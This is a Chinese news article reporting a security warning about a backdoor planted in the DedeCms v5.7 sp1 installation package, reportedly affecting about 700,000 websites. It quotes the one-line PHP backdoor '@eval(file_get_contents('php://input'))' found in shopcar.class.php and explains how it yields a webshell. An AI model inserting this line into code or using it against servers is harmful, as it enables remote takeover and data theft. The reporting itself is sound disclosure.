織夢CMS系統被曝植入后門 70萬網站資料或泄露

        織夢 CMS 中被植入的后門代碼

        3月 22 日消息，瑞星與 360 今日對外發布警示，稱國內知名的 PHP 開源網站管理系統織夢 CMS（DedeCms）v5.7 sp1 版本安裝包被發現植入后門，黑客可通過此后門直接獲得網站的控制權限，獲取存儲在服務器上的文件和數據庫。

        據織夢 CMS 官方數據顯示，目前約有 70 萬網站使用該系統搭建，涉及企業、政府機關、媒體機構、行業及個人網站等。

        安全界人士分析發現，此次織夢 CMS 曝出的后門惡意代碼存在于購物車類文件（shopcar.class.php）中，此類文件被植入一句后門代碼“@eval (file_get_contents ('php://input'));”。凡是調用該購物車類的文件均會觸發后門，黑客只需要構造簡單的數據包提交到服務器，就能夠獲取到該網站的 WebShell，通過對服務器進一步滲透攻擊，進而獲取服務器的最高權限，直接訪問服務器上的文件、數據庫等信息。